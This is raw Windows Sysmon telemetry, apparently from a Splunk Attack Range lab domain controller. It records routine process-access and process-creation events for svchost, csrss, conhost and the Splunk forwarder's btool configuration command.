13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8EE6-6005-D000-00000000A301}47644740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.659{59A5CD1D-8EE6-6005-D100-00000000A301}4872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.656{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8EE6-6005-CF00-00000000A301}47844780C:\Windows\system32\cmd.exe{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.653{59A5CD1D-8EE6-6005-D000-00000000A301}4764C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE6-6005-CF00-00000000A301}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:38.640{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
